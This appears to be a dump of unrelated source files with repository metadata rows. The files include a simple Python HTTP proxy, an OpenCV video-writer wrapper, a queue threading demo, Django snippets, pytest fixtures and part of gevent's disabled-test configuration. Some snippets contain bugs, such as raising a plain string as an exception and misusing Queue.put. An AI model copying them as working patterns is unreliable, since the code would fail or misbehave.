'friendship': friendship,
'bills_count': bills_count,
'templates_count': templates_count,
'words_count': words_count,
'folclor_posts_count': folclor_posts_count,
'threads_count': threads_count,
'threads_with_posts': threads_with_posts,
'can_moderate': can_moderate,
'page_type': page_type,
'commission': conf.accounts_settings.MONEY_SEND_COMMISSION}))
| [
"[email protected]"
] | |
3f0d333958350a92ac434aa6a8017a17d263453d | 2d929ed82d53e7d70db999753c60816ed00af171 | /Python/http/http_proxy.py | 413b48f03f8f201e702d427e39d87f53adca2682 | [] | no_license | nyannko/socket-example | b058e68e8d41a8a9f5b6a29108f7de394751c904 | 934e9791b1ee92f0dd3092bb07541f1e833b4105 | refs/heads/master | 2021-09-10T19:19:24.590441 | 2018-03-14T22:13:49 | 2018-03-14T22:13:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,577 | py | # HTTP proxy
from http.server import BaseHTTPRequestHandler, HTTPServer
from urlpath import URL
import socket
HOST = "127.0.0.1"
PORT = 8000
# Run `curl -x http://127.0.0.1:8000 http://www.moe.edu.cn' to test proxy
class ProxyHandler(BaseHTTPRequestHandler):
# GET method
def do_GET(self):
# todo add try catch here
url = URL(self.path)
ip = socket.gethostbyname(url.netloc)
port = url.port
if port is None:
port = 80
        path = url.path or "/"  # an empty path must still be sent as "/"
print("Connected to {} {} {}".format(url ,ip ,port))
        # Ask the origin server to close the connection afterwards. Delete any
        # existing Connection header first: assigning to this email.message-style
        # mapping appends a duplicate header rather than replacing the value.
        del self.headers["Proxy-Connection"]
        del self.headers["Connection"]
        self.headers["Connection"] = "close"
# reconstruct headers
send_data = "GET " + path + " " + self.protocol_version + "\r\n"
header = ""
for k, v in self.headers.items():
header += "{}: {}\r\n".format(k, v)
send_data += header + "\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
s.connect((ip, port))
s.sendall(send_data.encode())
# receive data from remote
received_data = b""
while 1:
data = s.recv(4096)
if not data:
break
received_data += data
s.close()
# send data to client
self.wfile.write(received_data)
def main():
try:
server = HTTPServer((HOST, PORT), ProxyHandler)
server.serve_forever()
except KeyboardInterrupt:
server.socket.close()
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
c5ecd02296aa16caffcde786d3ab77fae28405d1 | 28c598bf75f3ab287697c7f0ff1fb13bebb7cf75 | /build/bdist.win32/winexe/temp/OpenSSL.crypto.py | 6acfec583072680d7cf8126acf30df4957600e19 | [] | no_license | keaysma/solinia_depreciated | 4cb8811df4427261960af375cf749903d0ca6bd1 | 4c265449a5e9ca91f7acf7ac05cd9ff2949214ac | refs/heads/master | 2020-03-25T13:08:33.913231 | 2014-09-12T08:23:26 | 2014-09-12T08:23:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 343 | py |
def __load():
import imp, os, sys
try:
dirname = os.path.dirname(__loader__.archive)
except NameError:
dirname = sys.prefix
path = os.path.join(dirname, 'crypto.pyd')
#print "py2exe extension module", __name__, "->", path
mod = imp.load_dynamic(__name__, path)
## mod.frozen = 1
__load()
del __load
| [
"[email protected]"
] | |
16e0739edad97ed1235596b5089565cd8efa8f70 | 5b314502919bd7e12521ad126752d279912cd33d | /prodcons.py | d5e07a09cc1bdc3dcf283f36db18ea8f09ee3142 | [
"Apache-2.0"
] | permissive | xshi0001/base_function | 68576d484418b4cda8576f729d0b48a90d0258a1 | 77ed58289151084cc20bfc3328d3ca83e6a19366 | refs/heads/master | 2020-12-03T02:24:14.694973 | 2017-06-27T10:51:16 | 2017-06-27T10:51:16 | 95,935,169 | 1 | 0 | null | 2017-07-01T01:39:11 | 2017-07-01T01:39:11 | null | UTF-8 | Python | false | false | 1,533 | py | # -*-coding=utf-8
from Queue import Queue
from random import randint
from MyThread import MyThread
from time import sleep
def queue_test(q):
#q=Queue(10);
for i in range(10):
temp = randint(1, 10)
print temp
q.put("number:", temp)
print "size of queue is %d" % q.qsize()
def writeQ(q, i):
print "producter object for Q"
data = randint(1, 10)
#print "data is %d" %data
q.put(i, 1)
print "size now in producter is %d" % q.qsize()
def readQ(q):
print "consumer object for Q"
data = q.get(1)
print data
print "now after consume Q size is %d" % q.qsize()
def writer(q, loop):
for i in range(loop):
writeQ(q, i)
sleep_time = randint(1, 3)
sleep(sleep_time)
def reader(q, loop):
for i in range(loop):
readQ(q)
sleep_time = randint(2, 5)
sleep(sleep_time)
funcs = [writer, reader]
nfuncs = len(funcs)
def area_test(a):
a = a * 10
def main():
'''
a=2
print "a=%d" %a
area_test(a)
print "a now is a= %d" %a
q=Queue(10);
print "main q size %d" %q.qsize()
queue_test(q)
print "after function q size %d" %q.qsize()
'''
threads = []
q = Queue(10)
loop = 10
for i in range(nfuncs):
t = MyThread(funcs[i], (q, loop))
threads.append(t)
for i in range(nfuncs):
threads[i].start()
'''
for i in range(nfuncs):
threads[i].join()
'''
#print "end of main"
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
b4494671f38f7126a6d2398e2a96b7c336e7f55d | 2a34a824e1a2d3bac7b99edcf19926a477a157a0 | /src/cr/vision/io/videowriter.py | 7277eb9220a2e28a1d27d3f2748e3fc3a6ce7fee | [
"Apache-2.0"
] | permissive | carnotresearch/cr-vision | a7cb07157dbf470ed3fe560ef85d6e5194c660ae | 317fbf70c558e8f9563c3d0ba3bebbc5f84af622 | refs/heads/master | 2023-04-10T22:34:34.833043 | 2021-04-25T13:32:14 | 2021-04-25T13:32:14 | 142,256,002 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,323 | py | '''
Wrapper for OpenCV video writer
'''
import cv2
class VideoWriter:
'''Wrapper class for OpenCV video writer'''
def __init__(self, filepath, fourcc='XVID', fps=15, frame_size=(640, 480), is_color=True):
'''Constructor'''
self.filepath = filepath
if isinstance(fourcc, str):
fourcc = cv2.VideoWriter_fourcc(*fourcc)
elif isinstance(fourcc, int):
pass
else:
raise "Invalid fourcc code"
self.stream = cv2.VideoWriter(filepath, fourcc, fps, frame_size)
self.counter = 0
def write(self, frame):
'''Writes a frame to output file'''
self.stream.write(frame)
self.counter += 1
print(self.counter)
def is_open(self):
'''Returns if the stream is open for writing'''
if self.stream is None:
return False
return self.stream.isOpened()
def stop(self):
'''Stop serving more frames'''
if self.stream is None:
# nothing to do
return
self.stream.release()
self.stream = None
def __del__(self):
# Ensure cleanup
self.stop()
def __enter__(self):
return self
    def __exit__(self, exc_type, exc_value, traceback):
self.stop()
def __call__(self, frame):
self.write(frame)
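# Minimal usage sketch (the file name is arbitrary; the frames are synthetic
# black images, but any BGR numpy array matching frame_size works):
if __name__ == '__main__':
    import numpy as np
    with VideoWriter('demo.avi', fourcc='XVID', fps=15, frame_size=(640, 480)) as writer:
        for _ in range(30):
            writer.write(np.zeros((480, 640, 3), dtype=np.uint8))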
| [
"[email protected]"
] | |
a618bd2571db03d8262b8233c0af56287cb540db | 50dcaae873badd727e8416302a88f9c0bff0a438 | /bookstore/migrations/0002_auto_20170101_0049.py | d3e6f7c0947c25e5f8687afb88146674f49c0239 | [] | no_license | jattoabdul/albaitulilm | 4ae0dc857509012e8aa5d775cda64305de562251 | c5586edaed045fec925a6c0bb1be5e220cbd8d15 | refs/heads/master | 2021-01-13T00:00:01.397037 | 2017-02-12T23:32:42 | 2017-02-12T23:32:42 | 81,761,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 641 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-12-31 23:49
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bookstore', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='book',
options={'ordering': ['title'], 'verbose_name_plural': 'Books'},
),
migrations.AddField(
model_name='author',
name='image',
field=models.ImageField(blank=True, upload_to='authors', verbose_name="Author's Avatar"),
),
]
| [
"[email protected]"
] | |
00f65ca762f76f54444ea65692ecde4774dbdecc | d2c88caf05eed0c16db0f592bc876845232e1370 | /tccli/services/cr/__init__.py | 5c384eca0cc18a816ea88260a5faa51d5439a8be | [
"Apache-2.0"
] | permissive | jaschadub/tencentcloud-cli | f3549a2eea93a596b3ff50abf674ff56f708a3fc | 70f47d3c847b4c6197789853c73a50105abd0d35 | refs/heads/master | 2023-09-01T11:25:53.278666 | 2022-11-10T00:11:41 | 2022-11-10T00:11:41 | 179,168,651 | 0 | 0 | Apache-2.0 | 2022-11-11T06:35:51 | 2019-04-02T22:32:21 | Python | UTF-8 | Python | false | false | 83 | py | # -*- coding: utf-8 -*-
from tccli.services.cr.cr_client import action_caller
| [
"[email protected]"
] | |
fd5c1bace80b13e13c1a052dd0dcd6ce9afea215 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_340/ch4_2020_03_23_19_22_41_022512.py | 4f38805b970b740b4a241620cdc59197c4c64017 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 174 | py | def idade(x):
    x = int(input('digite sua idade'))
    if x <= 11:
        print('crianca')
    if 12 <= x <= 17:
        print('adolescente')
    if x >= 18:
        print('adulto')
    return x | [
"[email protected]"
] | |
e2db064b4c559a481a1ab0ba635a84b59bd259e2 | 3e19d4f20060e9818ad129a0813ee758eb4b99c6 | /conftest.py | 1b0f10a63a7f6eddd9bf25df6187cc5b35adee18 | [
"MIT"
] | permissive | ReyvanZA/bitfinex_ohlc_import | 07bf85f4de8b0be3dc6838e188160d2b4963f284 | 6d6d548187c52bcd7e7327f411fab515c83faef1 | refs/heads/master | 2020-08-11T14:22:15.832186 | 2019-10-31T17:51:21 | 2019-11-11T11:33:28 | 214,579,369 | 0 | 0 | MIT | 2019-11-11T11:33:29 | 2019-10-12T04:48:12 | null | UTF-8 | Python | false | false | 546 | py | import pytest
@pytest.fixture
def symbols_fixture():
# symbols for testing
return [
"btcusd",
"ltcbtc",
"ethusd"
]
@pytest.fixture
def candles_fixture():
    # Bitfinex-style candle rows: [MTS, OPEN, CLOSE, HIGH, LOW, VOLUME]
return [[
1518272040000,
8791,
8782.1,
8795.8,
8775.8,
20.01209543
],
[
1518271980000,
8768,
8790.7,
8791,
8768,
38.41333393
],
[
1518271920000,
8757.3,
8768,
8770.6396831,
8757.3,
20.92449167
]]
| [
"[email protected]"
] | |
3943484a0d61c50b4405bc497457b811c4b22f96 | 8adead984d1e2fd4f36ae4088a0363597fbca8a3 | /venv/lib/python3.7/site-packages/gevent/testing/patched_tests_setup.py | 3fdef75043869db42b012f8ad15407c4d116d9e0 | [] | no_license | ravisjoshi/python_snippets | 2590650c673763d46c16c9f9b8908997530070d6 | f37ed822b5863a5a11b09550dd32a73d68e7070b | refs/heads/master | 2022-11-05T03:48:10.842858 | 2020-06-14T09:19:46 | 2020-06-14T09:19:46 | 256,961,137 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 59,511 | py | # pylint:disable=missing-docstring,invalid-name,too-many-lines
from __future__ import print_function, absolute_import, division
import collections
import contextlib
import functools
import sys
import os
# At least on 3.6+, importing platform
# imports subprocess, which imports selectors. That
# can expose issues with monkey patching. We don't need it
# though.
# import platform
import re
from .sysinfo import RUNNING_ON_APPVEYOR as APPVEYOR
from .sysinfo import RUNNING_ON_TRAVIS as TRAVIS
from .sysinfo import RESOLVER_NOT_SYSTEM as ARES
from .sysinfo import RUN_COVERAGE
from .sysinfo import PYPY
from .sysinfo import PYPY3
from .sysinfo import PY3
from .sysinfo import PY2
from .sysinfo import PY35
from .sysinfo import PY36
from .sysinfo import PY37
from .sysinfo import PY38
from .sysinfo import WIN
from .sysinfo import OSX
from .sysinfo import LIBUV
from .sysinfo import CFFI_BACKEND
from . import flaky
CPYTHON = not PYPY
# By default, test cases are expected to switch and emit warnings if there was none
# If a test is found in this list, it's expected not to switch.
no_switch_tests = '''test_patched_select.SelectTestCase.test_error_conditions
test_patched_ftplib.*.test_all_errors
test_patched_ftplib.*.test_getwelcome
test_patched_ftplib.*.test_sanitize
test_patched_ftplib.*.test_set_pasv
#test_patched_ftplib.TestIPv6Environment.test_af
test_patched_socket.TestExceptions.testExceptionTree
test_patched_socket.Urllib2FileobjectTest.testClose
test_patched_socket.TestLinuxAbstractNamespace.testLinuxAbstractNamespace
test_patched_socket.TestLinuxAbstractNamespace.testMaxName
test_patched_socket.TestLinuxAbstractNamespace.testNameOverflow
test_patched_socket.FileObjectInterruptedTestCase.*
test_patched_urllib.*
test_patched_asyncore.HelperFunctionTests.*
test_patched_httplib.BasicTest.*
test_patched_httplib.HTTPSTimeoutTest.test_attributes
test_patched_httplib.HeaderTests.*
test_patched_httplib.OfflineTest.*
test_patched_httplib.HTTPSTimeoutTest.test_host_port
test_patched_httplib.SourceAddressTest.testHTTPSConnectionSourceAddress
test_patched_select.SelectTestCase.test_error_conditions
test_patched_smtplib.NonConnectingTests.*
test_patched_urllib2net.OtherNetworkTests.*
test_patched_wsgiref.*
test_patched_subprocess.HelperFunctionTests.*
'''
ignore_switch_tests = '''
test_patched_socket.GeneralModuleTests.*
test_patched_httpservers.BaseHTTPRequestHandlerTestCase.*
test_patched_queue.*
test_patched_signal.SiginterruptTest.*
test_patched_urllib2.*
test_patched_ssl.*
test_patched_signal.BasicSignalTests.*
test_patched_threading_local.*
test_patched_threading.*
'''
def make_re(tests):
tests = [x.strip().replace(r'\.', r'\\.').replace('*', '.*?')
for x in tests.split('\n') if x.strip()]
    # Group the alternation so the anchors apply to every pattern, not just
    # the first and last alternatives.
    return re.compile('^(?:%s)$' % '|'.join(tests))
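# For example (illustrative): the pattern line 'test_patched_urllib.*' becomes
# the fragment 'test_patched_urllib..*?', and all fragments are joined into a
# single anchored alternation of the form '^(?:frag1|frag2|...)$'.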
no_switch_tests = make_re(no_switch_tests)
ignore_switch_tests = make_re(ignore_switch_tests)
def get_switch_expected(fullname):
"""
>>> get_switch_expected('test_patched_select.SelectTestCase.test_error_conditions')
False
>>> get_switch_expected('test_patched_socket.GeneralModuleTests.testCrucialConstants')
False
>>> get_switch_expected('test_patched_socket.SomeOtherTest.testHello')
True
>>> get_switch_expected("test_patched_httplib.BasicTest.test_bad_status_repr")
False
"""
# certain pylint versions mistype the globals as
# str, not re.
# pylint:disable=no-member
if ignore_switch_tests.match(fullname) is not None:
return None
if no_switch_tests.match(fullname) is not None:
return False
return True
disabled_tests = [
# The server side takes awhile to shut down
'test_httplib.HTTPSTest.test_local_bad_hostname',
# These were previously 3.5+ issues (same as above)
# but have been backported.
'test_httplib.HTTPSTest.test_local_good_hostname',
'test_httplib.HTTPSTest.test_local_unknown_cert',
'test_threading.ThreadTests.test_PyThreadState_SetAsyncExc',
# uses some internal C API of threads not available when threads are emulated with greenlets
'test_threading.ThreadTests.test_join_nondaemon_on_shutdown',
# asserts that repr(sleep) is '<built-in function sleep>'
'test_urllib2net.TimeoutTest.test_ftp_no_timeout',
'test_urllib2net.TimeoutTest.test_ftp_timeout',
'test_urllib2net.TimeoutTest.test_http_no_timeout',
'test_urllib2net.TimeoutTest.test_http_timeout',
# accesses _sock.gettimeout() which is always in non-blocking mode
'test_urllib2net.OtherNetworkTests.test_ftp',
# too slow
'test_urllib2net.OtherNetworkTests.test_urlwithfrag',
# fails dues to some changes on python.org
'test_urllib2net.OtherNetworkTests.test_sites_no_connection_close',
# flaky
'test_socket.UDPTimeoutTest.testUDPTimeout',
# has a bug which makes it fail with error: (107, 'Transport endpoint is not connected')
# (it creates a TCP socket, not UDP)
'test_socket.GeneralModuleTests.testRefCountGetNameInfo',
# fails with "socket.getnameinfo loses a reference" while the reference is only "lost"
# because it is referenced by the traceback - any Python function would lose a reference like that.
# the original getnameinfo does not "lose" it because it's in C.
'test_socket.NetworkConnectionNoServer.test_create_connection_timeout',
# replaces socket.socket with MockSocket and then calls create_connection.
# this unfortunately does not work with monkey patching, because gevent.socket.create_connection
# is bound to gevent.socket.socket and updating socket.socket does not affect it.
    # this issue also manifests itself when not monkey patching DNS: http://code.google.com/p/gevent/issues/detail?id=54
# create_connection still uses gevent.socket.getaddrinfo while it should be using socket.getaddrinfo
'test_asyncore.BaseTestAPI.test_handle_expt',
    # sends some OOB data and expects it to be detected as such; gevent.select.select does not support that
# This one likes to check its own filename, but we rewrite
# the file to a temp location during patching.
'test_asyncore.HelperFunctionTests.test_compact_traceback',
# expects time.sleep() to return prematurely in case of a signal;
# gevent.sleep() is better than that and does not get interrupted
# (unless signal handler raises an error)
'test_signal.WakeupSignalTests.test_wakeup_fd_early',
# expects select.select() to raise select.error(EINTR'interrupted
# system call') gevent.select.select() does not get interrupted
# (unless signal handler raises an error) maybe it should?
'test_signal.WakeupSignalTests.test_wakeup_fd_during',
'test_signal.SiginterruptTest.test_without_siginterrupt',
'test_signal.SiginterruptTest.test_siginterrupt_on',
# these rely on os.read raising EINTR which never happens with gevent.os.read
'test_subprocess.ProcessTestCase.test_leak_fast_process_del_killed',
'test_subprocess.ProcessTestCase.test_zombie_fast_process_del',
# relies on subprocess._active which we don't use
    # Very slow, tries to open lots and lots of subprocesses and files,
    # tends to time out on CI.
'test_subprocess.ProcessTestCase.test_no_leaking',
# This test is also very slow, and has been timing out on Travis
# since November of 2016 on Python 3, but now also seen on Python 2/Pypy.
'test_subprocess.ProcessTestCase.test_leaking_fds_on_error',
# Added between 3.6.0 and 3.6.3, uses _testcapi and internals
# of the subprocess module. Backported to Python 2.7.16.
'test_subprocess.POSIXProcessTestCase.test_stopped',
'test_ssl.ThreadedTests.test_default_ciphers',
'test_ssl.ThreadedTests.test_empty_cert',
'test_ssl.ThreadedTests.test_malformed_cert',
'test_ssl.ThreadedTests.test_malformed_key',
'test_ssl.NetworkedTests.test_non_blocking_connect_ex',
# XXX needs investigating
'test_ssl.NetworkedTests.test_algorithms',
# The host this wants to use, sha256.tbs-internet.com, is not resolvable
# right now (2015-10-10), and we need to get Windows wheels
# This started timing out randomly on Travis in oct/nov 2018. It appears
# to be something with random number generation taking too long.
'test_ssl.BasicSocketTests.test_random_fork',
# Relies on the repr of objects (Py3)
'test_ssl.BasicSocketTests.test_dealloc_warn',
'test_urllib2.HandlerTests.test_cookie_redirect',
# this uses cookielib which we don't care about
'test_thread.ThreadRunningTests.test__count',
'test_thread.TestForkInThread.test_forkinthread',
# XXX needs investigating
'test_subprocess.POSIXProcessTestCase.test_preexec_errpipe_does_not_double_close_pipes',
# Does not exist in the test suite until 2.7.4+. Subclasses Popen, and overrides
# _execute_child. But our version has a different parameter list than the
# version that comes with PyPy/CPython, so fails with a TypeError.
# This one crashes the interpreter if it has a bug parsing the
# invalid data.
'test_ssl.BasicSocketTests.test_parse_cert_CVE_2019_5010',
# We had to copy in a newer version of the test file for SSL fixes
# and this doesn't work reliably on all versions.
'test_httplib.HeaderTests.test_headers_debuglevel',
# These depend on the exact error message produced by the interpreter
# when too many arguments are passed to functions. We can't match
# the exact signatures (because Python 2 doesn't support the syntax)
'test_context.ContextTest.test_context_new_1',
'test_context.ContextTest.test_context_var_new_1',
]
if 'thread' in os.getenv('GEVENT_FILE', ''):
disabled_tests += [
'test_subprocess.ProcessTestCase.test_double_close_on_error'
# Fails with "OSError: 9 invalid file descriptor"; expect GC/lifetime issues
]
if PY2 and PYPY:
disabled_tests += [
# These appear to hang or take a long time for some reason?
# Likely a hostname/binding issue or failure to properly close/gc sockets.
'test_httpservers.BaseHTTPServerTestCase.test_head_via_send_error',
'test_httpservers.BaseHTTPServerTestCase.test_head_keep_alive',
'test_httpservers.BaseHTTPServerTestCase.test_send_blank',
'test_httpservers.BaseHTTPServerTestCase.test_send_error',
'test_httpservers.BaseHTTPServerTestCase.test_command',
'test_httpservers.BaseHTTPServerTestCase.test_handler',
'test_httpservers.CGIHTTPServerTestcase.test_post',
'test_httpservers.CGIHTTPServerTestCase.test_query_with_continuous_slashes',
'test_httpservers.CGIHTTPServerTestCase.test_query_with_multiple_question_mark',
'test_httpservers.CGIHTTPServerTestCase.test_os_environ_is_not_altered',
# This one sometimes results on connection refused
'test_urllib2_localnet.TestUrlopen.test_info',
# Sometimes hangs
'test_ssl.ThreadedTests.test_socketserver',
# We had to update 'CERTFILE' to continue working, but
# this test hasn't been updated yet (the CPython tests
# are also too new to run on PyPy).
'test_ssl.BasicSocketTests.test_parse_cert',
]
if LIBUV:
# epoll appears to work with these just fine in some cases;
# kqueue (at least on OS X, the only tested kqueue system)
# never does (failing with abort())
# (epoll on Raspbian 8.0/Debian Jessie/Linux 4.1.20 works;
# on a VirtualBox image of Ubuntu 15.10/Linux 4.2.0 both tests fail;
# Travis CI Ubuntu 12.04 precise/Linux 3.13 causes one of these tests to hang forever)
# XXX: Retry this with libuv 1.12+
disabled_tests += [
# A 2.7 test. Tries to fork, and libuv cannot fork
'test_signal.InterProcessSignalTests.test_main',
# Likewise, a forking problem
'test_signal.SiginterruptTest.test_siginterrupt_off',
]
if PY2:
if TRAVIS:
if CPYTHON:
disabled_tests += [
# This appears to crash the process, for some reason,
# but only on CPython 2.7.14 on Travis. Cannot reproduce in
# 2.7.14 on macOS or 2.7.12 in local Ubuntu 16.04
'test_subprocess.POSIXProcessTestCase.test_close_fd_0',
'test_subprocess.POSIXProcessTestCase.test_close_fds_0_1',
'test_subprocess.POSIXProcessTestCase.test_close_fds_0_2',
]
if PYPY:
disabled_tests += [
# This seems to crash the interpreter. I cannot reproduce
# on macOS or local Linux VM.
# See https://travis-ci.org/gevent/gevent/jobs/348661604#L709
'test_smtplib.TooLongLineTests.testLineTooLong',
]
if ARES:
disabled_tests += [
# This can timeout with a socket timeout in ssl.wrap_socket(c)
# on Travis. I can't reproduce locally.
'test_ssl.ThreadedTests.test_handshake_timeout',
]
if PY3:
disabled_tests += [
# This test wants to pass an arbitrary fileno
# to a socket and do things with it. libuv doesn't like this,
# it raises EPERM. It is disabled on windows already.
# It depends on whether we had a fd already open and multiplexed with
'test_socket.GeneralModuleTests.test_unknown_socket_family_repr',
# And yes, there's a typo in some versions.
'test_socket.GeneralModuleTests.test_uknown_socket_family_repr',
]
if PY37:
disabled_tests += [
# This test sometimes fails at line 358. It's apparently
# extremely sensitive to timing.
'test_selectors.PollSelectorTestCase.test_timeout',
]
if OSX:
disabled_tests += [
# XXX: Starting when we upgraded from libuv 1.18.0
# to 1.19.2, this sometimes (usually) started having
# a series of calls ('select.poll(0)', 'select.poll(-1)')
# take longer than the allowed 0.5 seconds. Debugging showed that
# it was the second call that took longer, for no apparent reason.
# There doesn't seem to be a change in the source code to libuv that
# would affect this.
# XXX-XXX: This actually disables too many tests :(
'test_selectors.PollSelectorTestCase.test_timeout',
]
if RUN_COVERAGE:
disabled_tests += [
# Starting with #1145 this test (actually
# TestTLS_FTPClassMixin) becomes sensitive to timings
# under coverage.
'test_ftplib.TestFTPClass.test_storlines',
]
if sys.platform.startswith('linux'):
disabled_tests += [
# crashes with EPERM, which aborts the epoll loop, even
# though it was allowed in in the first place.
'test_asyncore.FileWrapperTest.test_dispatcher',
]
if WIN and PY2:
# From PyPy2-v5.9.0 and CPython 2.7.14, using its version of tests,
# which do work on darwin (and possibly linux?)
# I can't produce them in a local VM running Windows 10
# and the same pypy version.
disabled_tests += [
# These, which use asyncore, fail with
# 'NoneType is not iterable' on 'conn, addr = self.accept()'
# That returns None when the underlying socket raises
# EWOULDBLOCK, which it will do because it's set to non-blocking
# both by gevent and by libuv (at the level below python's knowledge)
# I can *usually* reproduce these locally; it seems to be some sort
# of race condition.
'test_ftplib.TestFTPClass.test_acct',
'test_ftplib.TestFTPClass.test_all_errors',
'test_ftplib.TestFTPClass.test_cwd',
'test_ftplib.TestFTPClass.test_delete',
'test_ftplib.TestFTPClass.test_dir',
'test_ftplib.TestFTPClass.test_exceptions',
'test_ftplib.TestFTPClass.test_getwelcome',
'test_ftplib.TestFTPClass.test_line_too_long',
'test_ftplib.TestFTPClass.test_login',
'test_ftplib.TestFTPClass.test_makepasv',
'test_ftplib.TestFTPClass.test_mkd',
'test_ftplib.TestFTPClass.test_nlst',
'test_ftplib.TestFTPClass.test_pwd',
'test_ftplib.TestFTPClass.test_quit',
'test_ftplib.TestFTPClass.test_makepasv',
'test_ftplib.TestFTPClass.test_rename',
'test_ftplib.TestFTPClass.test_retrbinary',
'test_ftplib.TestFTPClass.test_retrbinary_rest',
'test_ftplib.TestFTPClass.test_retrlines',
'test_ftplib.TestFTPClass.test_retrlines_too_long',
'test_ftplib.TestFTPClass.test_rmd',
'test_ftplib.TestFTPClass.test_sanitize',
'test_ftplib.TestFTPClass.test_set_pasv',
'test_ftplib.TestFTPClass.test_size',
'test_ftplib.TestFTPClass.test_storbinary',
'test_ftplib.TestFTPClass.test_storbinary_rest',
'test_ftplib.TestFTPClass.test_storlines',
'test_ftplib.TestFTPClass.test_storlines_too_long',
'test_ftplib.TestFTPClass.test_voidcmd',
'test_ftplib.TestTLS_FTPClass.test_data_connection',
'test_ftplib.TestTLS_FTPClass.test_control_connection',
'test_ftplib.TestTLS_FTPClass.test_context',
'test_ftplib.TestTLS_FTPClass.test_check_hostname',
'test_ftplib.TestTLS_FTPClass.test_auth_ssl',
'test_ftplib.TestTLS_FTPClass.test_auth_issued_twice',
# This one times out, but it's still a non-blocking socket
'test_ftplib.TestFTPClass.test_makeport',
# A timeout, possibly because of the way we handle interrupts?
'test_socketserver.SocketServerTest.test_InterruptedServerSelectCall',
'test_socketserver.SocketServerTest.test_InterruptServerSelectCall',
# times out with something about threading?
# The apparent hang is just after the print of "waiting for server"
'test_socketserver.SocketServerTest.test_ThreadingTCPServer',
'test_socketserver.SocketServerTest.test_ThreadingUDPServer',
'test_socketserver.SocketServerTest.test_TCPServer',
'test_socketserver.SocketServerTest.test_UDPServer',
# This one might be like 'test_urllib2_localnet.TestUrlopen.test_https_with_cafile'?
# XXX: Look at newer pypy and verify our usage of drop/reuse matches
# theirs.
'test_httpservers.BaseHTTPServerTestCase.test_command',
'test_httpservers.BaseHTTPServerTestCase.test_handler',
'test_httpservers.BaseHTTPServerTestCase.test_head_keep_alive',
'test_httpservers.BaseHTTPServerTestCase.test_head_via_send_error',
'test_httpservers.BaseHTTPServerTestCase.test_header_close',
'test_httpservers.BaseHTTPServerTestCase.test_internal_key_error',
'test_httpservers.BaseHTTPServerTestCase.test_request_line_trimming',
'test_httpservers.BaseHTTPServerTestCase.test_return_custom_status',
'test_httpservers.BaseHTTPServerTestCase.test_send_blank',
'test_httpservers.BaseHTTPServerTestCase.test_send_error',
'test_httpservers.BaseHTTPServerTestCase.test_version_bogus',
'test_httpservers.BaseHTTPServerTestCase.test_version_digits',
'test_httpservers.BaseHTTPServerTestCase.test_version_invalid',
'test_httpservers.BaseHTTPServerTestCase.test_version_none',
'test_httpservers.SimpleHTTPServerTestCase.test_get',
'test_httpservers.SimpleHTTPServerTestCase.test_head',
'test_httpservers.SimpleHTTPServerTestCase.test_invalid_requests',
'test_httpservers.SimpleHTTPServerTestCase.test_path_without_leading_slash',
'test_httpservers.CGIHTTPServerTestCase.test_invaliduri',
'test_httpservers.CGIHTTPServerTestCase.test_issue19435',
# Unexpected timeouts sometimes
'test_smtplib.TooLongLineTests.testLineTooLong',
'test_smtplib.GeneralTests.testTimeoutValue',
# This sometimes crashes, which can't be our fault?
'test_ssl.BasicSocketTests.test_parse_cert_CVE_2019_5010',
]
if PYPY:
disabled_tests += [
# appears to time out?
'test_threading.ThreadTests.test_finalize_with_trace',
'test_asyncore.DispatcherWithSendTests_UsePoll.test_send',
'test_asyncore.DispatcherWithSendTests.test_send',
# More unexpected timeouts
'test_ssl.ContextTests.test__https_verify_envvar',
'test_subprocess.ProcessTestCase.test_check_output',
'test_telnetlib.ReadTests.test_read_eager_A',
# But on Windows, our gc fix for that doesn't work anyway
# so we have to disable it.
'test_urllib2_localnet.TestUrlopen.test_https_with_cafile',
# These tests hang; see above.
'test_threading.ThreadJoinOnShutdown.test_1_join_on_shutdown',
'test_threading.ThreadingExceptionTests.test_print_exception',
# Our copy of these in test__subprocess.py also hangs.
# Anything that uses Popen.communicate or directly uses
# Popen.stdXXX.read hangs. It's not clear why.
'test_subprocess.ProcessTestCase.test_communicate',
'test_subprocess.ProcessTestCase.test_cwd',
'test_subprocess.ProcessTestCase.test_env',
'test_subprocess.ProcessTestCase.test_stderr_pipe',
'test_subprocess.ProcessTestCase.test_stdout_pipe',
'test_subprocess.ProcessTestCase.test_stdout_stderr_pipe',
'test_subprocess.ProcessTestCase.test_stderr_redirect_with_no_stdout_redirect',
'test_subprocess.ProcessTestCase.test_stdout_filedes_of_stdout',
'test_subprocess.ProcessTestCase.test_stdout_none',
'test_subprocess.ProcessTestCase.test_universal_newlines',
'test_subprocess.ProcessTestCase.test_writes_before_communicate',
'test_subprocess.Win32ProcessTestCase._kill_process',
'test_subprocess.Win32ProcessTestCase._kill_dead_process',
'test_subprocess.Win32ProcessTestCase.test_shell_sequence',
'test_subprocess.Win32ProcessTestCase.test_shell_string',
'test_subprocess.CommandsWithSpaces.with_spaces',
]
if WIN:
disabled_tests += [
# This test winds up hanging a long time.
# Inserting GCs doesn't fix it.
'test_ssl.ThreadedTests.test_handshake_timeout',
# These sometimes raise LoopExit, for no apparent reason,
# mostly but not exclusively on Python 2. Sometimes (often?)
# this happens in the setUp() method when we attempt to get a client
# connection
'test_socket.BufferIOTest.testRecvFromIntoBytearray',
'test_socket.BufferIOTest.testRecvFromIntoArray',
'test_socket.BufferIOTest.testRecvIntoArray',
'test_socket.BufferIOTest.testRecvIntoMemoryview',
'test_socket.BufferIOTest.testRecvFromIntoEmptyBuffer',
'test_socket.BufferIOTest.testRecvFromIntoMemoryview',
